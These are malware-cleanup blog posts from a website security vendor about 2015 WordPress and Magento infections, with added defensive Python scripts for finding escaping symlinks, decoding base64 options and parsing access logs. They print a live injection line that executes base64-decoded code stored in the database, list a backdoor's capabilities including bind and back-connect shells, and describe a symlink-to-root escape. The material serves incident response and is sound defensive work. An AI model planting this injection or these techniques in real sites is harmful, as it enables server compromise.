Monday, November 23, 2015

Hacked WordPress Sites To Gain Control Over Entire VPS

"RevSlider" Plugin Vulnerability Used to Access VPS File System


Background

The issue was discovered during a malware clean-up of a WordPress installation on a private VPS that also hosted around 20 more WP installations. The automatic cure procedure came back showing infection left-overs, so we switched to manual investigation. This short post shows how simple and ingenious some hacks can be.

Malware investigation 

First checks showed that the VPS was infected via an outdated RevSlider installation (3.0.95), which let the attackers upload arbitrary files to the host. Searching further we found a strange directory, wp-content/plugins/revslider/temp/update_extract/sym. On inspection it turned out to contain a symlink to "/" (the VPS root directory). As simple as that. Needless to say, this gave the attackers access to the entire file system of the VPS: they could reach any file or directory on it, and used that to infect all the other WP installations.

Removing this directory and updating the vulnerable plugin solved the issue.
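A defender-side check for this kind of escape, added here as an example and not part of the original post: it walks a document root and reports every symlink whose resolved target lies outside that root. The demo tree it builds in a temporary directory (including a revslider/temp/update_extract/sym link to "/") is constructed for the example.

```python
import os
import tempfile


def find_escaping_symlinks(docroot):
    """Return [(relative_link_path, resolved_target)] for every symlink below
    docroot whose target resolves outside docroot (e.g. a plugin temp dir -> "/")."""
    root = os.path.realpath(docroot)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        # symlinks to directories are listed in dirnames (not descended), so check both lists
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([root, target]) != root:
                hits.append((os.path.relpath(path, root), target))
    return sorted(hits)


def build_demo_docroot():
    """Constructed sample: a WordPress-like docroot with one benign in-tree symlink
    and one symlink that, like the RevSlider case above, points at '/'."""
    docroot = tempfile.mkdtemp(prefix="wp-demo-")
    extract_dir = os.path.join(docroot, "wp-content", "plugins", "revslider", "temp", "update_extract")
    os.makedirs(extract_dir)
    os.makedirs(os.path.join(docroot, "wp-content", "uploads"))
    os.symlink("/", os.path.join(extract_dir, "sym"))  # the escape
    os.symlink(os.path.join(docroot, "wp-content", "uploads"),
               os.path.join(docroot, "media"))  # benign: stays inside docroot
    return docroot


def demo():
    """Build the sample tree and return the escaping symlinks found in it."""
    return find_escaping_symlinks(build_demo_docroot())


if __name__ == "__main__":
    for link, target in demo():
        print("symlink escapes docroot: %s -> %s" % (link, target))
```

Run it against a real docroot with find_escaping_symlinks("/var/www/html"); any hit outside the web root deserves a look.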

If you suspect your website was compromised or would like us to remove the malware, please select from the ThreatSign website monitoring and malware clean-up plans. To run a free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

Tuesday, October 20, 2015

Massive Magento Infection

Magento eCommerce Platform Hack and Repair

Recently, Quttera's malware analysts have been receiving a significant flow of malware removal requests for websites powered by Magento. The attack managed to get a handful of sites onto Google's blacklists within just a few hours. On 17-Oct, Magento published cleanup instructions and a mitigation plan for this malware.

This post shares the complete infection code to raise awareness among Magento users, in an attempt to minimize the damage and avoid blacklisting.

Full infection code can be reviewed here: http://pastebin.com/XRnaNCUT

Screenshot of Magento Malware


If you still need any help with this or any other malware issue on Magento or another platform, Quttera is here to help.

Tuesday, July 28, 2015

Learn What Milw0rm Backdoor Malware Can Do With Your System


Background

Like the majority of our posts, this one is based on a recent malware investigation and clean-up of an infected website. It shows which tools a backdoor, in this case milw0rm, gives hackers once it is planted on the compromised website.

Hard to find due to thorough encryption and its indirect connection to the affected website, the backdoor easily bypasses authentication and establishes remote access to the server. From that moment on, an attacker can use your system without being detected. If you think you've been infected by a backdoor or any other malware, feel free to reach out to us at https://helpdesk.quttera.com

Milw0rm Backdoor Capabilities

Below is a list of actions that attackers can perform without your consent.

  • Server information gathering
    • OS
    • PHP version
    • Hard disk
    • Server IP
    • Client IP
Milw0rm backdoor. View the security information

  • File tools
    • Change directory
    • Make directory
    • Execute file
    • Upload file
    • Compress/uncompress file (zip)
Milw0rm backdoor. File tools/compress/uncompress file

  • Console
    • List directory
    • Show active connections
    • IP configuration
    • ARP table
Milw0rm backdoor. Console.

  • SQL browser
  • Execute PHP code
  • Safe mode bypass
    • Read file
    • List directory
    • Curl
    • Ini restore
  • String tools
    • String conversion
    • Search text in files
    • Search for hash
Milw0rm backdoor. String tools/conversion.

  • FTP bruteforce
  • Network tools
    • Bind port to /bin/sh
    • Back-connect
  • Self remove
    • Remove the backdoor shell
  • View all the security information of the server
    • Server software
    • Disabled PHP functions
    • cURL support
    • User account names
Needless to say, with this level of access and control over the website and server the hacker can upload other malicious code. At this stage the choice is very broad: email spammers, Distributed Denial of Service (DDoS) tools, fake logins, etc.

Attack origin and prevention

Avoid FTP usernames (and, in fact, any other usernames) that can be found on your website. As happened in this case, they give hackers a head start for brute-forcing your FTP credentials.

Resolution

As part of our anti-malware services for websites, the backdoor was removed and a reconsideration request has been submitted to remove the website from Google's and other vendors' blacklists.

Wednesday, May 27, 2015

Identifying and Removing Spam From the WordPress Database

Background

At first glance, this case of spam clean-up on a WordPress website didn't stand out. The customer was blacklisted by Google due to spam posts. As part of the blacklisting removal service we reviewed the Google alert and started working. An internal malware scan with Quttera tools quickly identified and verified the infection and its type. However, the spam posts kept re-appearing after successful clean-ups. This post is a short overview of the spam removal process, to give you hints when you search for the origin of spam on your own websites.

Malware Scan and Investigation

As there were no suspicious posts in the WordPress dashboard, we started to investigate the content of the MySQL database tables. The spam posts were found and removed from the database, but in no time new posts with different spam content were added. Next, we checked which cache plugins were installed and removed them to reduce "investigation noise". After that, we dumped the content of the wp_options table and investigated it. During the investigation we found two malicious WordPress options: wpdcon and wptheme_opt.

wpdcon contained suspicious IP masks encoded with base64:

NS4yNTUuMTkyLjAtMTg= 
OC4qLiouKg==
MTIuMC4qLio= 

For full body see here - http://pastebin.com/uYzXu1B3

These masks are used to recognize whether a request came from a human visitor.

wptheme_opt (http://pastebin.com/cdFLyL9X) contained the actual body that loaded spam posts into the database.

When these options were removed, their absence started to generate errors upon access to the website. Investigating those errors highlighted the exact injection place.

Following is a dump of the infection:

    add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));
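An added example, not code from the original post: a small Python triage script that scans wp_options values for the pattern the injected line relies on, a PHP-serialized array of base64 strings, and decodes them. The wp_options rows are a constructed sample: the wpdcon masks are the three base64 values quoted above, while the wptheme_opt payload is replaced by two harmless placeholder statements.

```python
import base64
import re

# Constructed wp_options sample: option names are the ones from the case above, the
# wpdcon values are the three base64 masks quoted in the post, and wptheme_opt holds
# two harmless placeholder PHP statements ("echo 1;", "echo 2;") instead of the real payload.
SAMPLE_OPTIONS = {
    "blogname": "My Site",
    "wpdcon": 'a:3:{i:0;s:20:"NS4yNTUuMTkyLjAtMTg=";i:1;s:12:"OC4qLiouKg==";i:2;s:12:"MTIuMC4qLio=";}',
    "wptheme_opt": 'a:2:{i:0;s:12:"ZWNobyAxOw==";i:1;s:12:"ZWNobyAyOw==";}',
}


def php_unserialize_string_array(value):
    """Parse PHP serialize() output for a flat array of strings; returns None for
    anything else (deliberately not a full unserializer)."""
    head = re.match(r'a:(\d+):\{', value)
    if not head:
        return None
    pos, items = head.end(), []
    for _ in range(int(head.group(1))):
        key = re.match(r'(?:i:-?\d+|s:\d+:"[^"]*");', value[pos:])
        if not key:
            return None
        pos += key.end()
        s = re.match(r's:(\d+):"', value[pos:])
        if not s:
            return None
        start = pos + s.end()
        end = start + int(s.group(1))  # s:N is the byte length of the string
        if value[end:end + 2] != '";':
            return None
        items.append(value[start:end])
        pos = end + 2
    return items if value[pos:] == "}" else None


def decode_base64_array_options(options):
    """Return {option: [decoded strings]} for every option whose value is a serialized
    array of base64 text, the shape that get_option("wptheme_opt") fed into
    array_map("base64_decode", ...) in the injected line above."""
    found = {}
    for name, raw in options.items():
        items = php_unserialize_string_array(raw)
        if not items:
            continue
        try:
            found[name] = [base64.b64decode(i, validate=True).decode("utf-8") for i in items]
        except (ValueError, UnicodeDecodeError):
            continue  # serialized array, but its elements are not base64 text: not this pattern
    return found
```

Feed it a dict built from `SELECT option_name, option_value FROM wp_options` and review every option it reports; legitimate options rarely store arrays of base64 text.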

Resolution

As part of our anti-malware services for websites, a reconsideration request has been submitted and Google has removed its alert.


Thursday, February 12, 2015

Websites hacked by KkK1337 and NG689Skw

Hackers compromising vulnerable websites and defacing them


Background


Recently, our malware clean-up experts worked on sites that were hacked by the KkK1337 hackers. Some sites were hacked with the help of another team, NG689Skw. One of the defacement notes included the following text: Developers Newbie ~ Indonesia Stealth Cyber Army ~ Amuntai Hacker Team

According to Google and some other resources, the count of hacked websites is around 170 (List of sites).


As of today, we have not been informed of any other damage by those groups, besides defacement and business websites that went offline due to clean-up activities.

Resources

Here are some signs of the infection that we posted on pastebin:

Encoded infection - team logo body

Decoded infection

Few screenshots from compromised websites






Sunday, January 25, 2015

How To Locate Hosts That Are Infecting Or Sending Spam From Your WordPress Installation

Steps To Discover Malicious Hosts Attempting To Access Your Website 

When dealing with a previously cleaned website that gets re-infected over and over again, it is essential to monitor and check who tried to connect to the website, and when. Usually, a POST request is used to access the malware files and launch the malicious script or command. Thus, once you have the file names you can review the log files (e.g. access.log for Apache) to detect the servers that were sending these malicious requests.

The next steps would be to block those IPs to avoid further attacks and to inform your provider. Further, you can use 'whois' to find out who hosts those IPs and file an abuse request to have them removed.

Example steps for cPanel users to access logs and detect attackers

Similar steps apply to other control panel providers.

  1. Log in to cPanel and go to "Stats & Logs"
  2. Select "Raw Access Logs" from the menu to navigate to the logs archive

    cPanel - Raw Access Log
  3. Download the logs archive

    cPanel - download raw access log archive
  4. Extract the archive content to an empty directory
  5. Run the following command on the extracted file: # grep -irHn POST <file> | grep -v admin

When you are done with all the steps above, you should see output containing the date/time, the file and the IP that tried to access this file, along with other info.

Here is an example shared by a Quttera-Labs researcher, taken from one recent malware removal process:

85.214.94.159 - - [24/Jan/2015:21:32:41 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
85.214.94.159 - - [24/Jan/2015:21:32:44 +0100] "POST /wp-includes/SimplePie/Content/Type/info.php HTTP/1.1" 404 72387 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
85.214.94.159 - - [24/Jan/2015:21:32:45 +0100] "POST /wp-content/plugins/jetpack/modules/social-links.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"

91.121.60.19 - - [25/Jan/2015:03:49:33 +0100] "POST /wp-content/plugins/wp-statistics/includes/functions/general.php HTTP/1.1" 404 72407 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
91.121.60.19 - - [25/Jan/2015:03:49:36 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
91.121.60.19 - - [25/Jan/2015:03:49:37 +0100] "POST /wp-content/plugins/woocommerce/i18n/db.php HTTP/1.1" 404 72386 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
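A structured version of the grep step above, added here as an example (not the post's own tooling): it parses Apache combined-format lines, keeps POST requests to .php files outside the admin area, groups them by client IP, and separates the requests that got a 200 (the file still exists and needs inspection) from the 404s. The sample lines are the six log entries quoted above, with the wrapped lines re-joined.

```python
import re
from collections import defaultdict

# Sample input: the six log entries quoted in the post, with extraction line-wraps re-joined.
SAMPLE_LOG = [
    '85.214.94.159 - - [24/Jan/2015:21:32:41 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
    '85.214.94.159 - - [24/Jan/2015:21:32:44 +0100] "POST /wp-includes/SimplePie/Content/Type/info.php HTTP/1.1" 404 72387 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
    '85.214.94.159 - - [24/Jan/2015:21:32:45 +0100] "POST /wp-content/plugins/jetpack/modules/social-links.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
    '91.121.60.19 - - [25/Jan/2015:03:49:33 +0100] "POST /wp-content/plugins/wp-statistics/includes/functions/general.php HTTP/1.1" 404 72407 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
    '91.121.60.19 - - [25/Jan/2015:03:49:36 +0100] "POST /wp-content/uploads/mp3-320/insomnia3/320/db.php HTTP/1.1" 404 72391 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
    '91.121.60.19 - - [25/Jan/2015:03:49:37 +0100] "POST /wp-content/plugins/woocommerce/i18n/db.php HTTP/1.1" 404 72386 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"',
]

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_posts(lines, exclude="admin"):
    """Group POST requests to .php files by client IP, skipping paths that contain
    `exclude` (the structured equivalent of `grep POST | grep -v admin`)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if exclude in path or not path.endswith(".php"):
            continue
        by_ip[rec["ip"]].append((rec["time"], path, int(rec["status"])))
    return dict(by_ip)


def report(lines):
    """Per IP: number of suspicious POSTs and the paths that answered 200, i.e. files
    that still exist on the server and must be inspected (the 404s were already gone)."""
    rows = []
    for ip, reqs in sorted(suspicious_posts(lines).items()):
        still_present = sorted({path for _, path, status in reqs if status == 200})
        rows.append((ip, len(reqs), still_present))
    return rows


if __name__ == "__main__":
    for ip, count, present in report(SAMPLE_LOG):
        print("%s: %d suspicious POSTs, files still present: %s" % (ip, count, present or "none"))
```

On a real log, pass `open("access.log")` as `lines`; the IPs in the output are the ones to block and to report to their hosts via whois.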
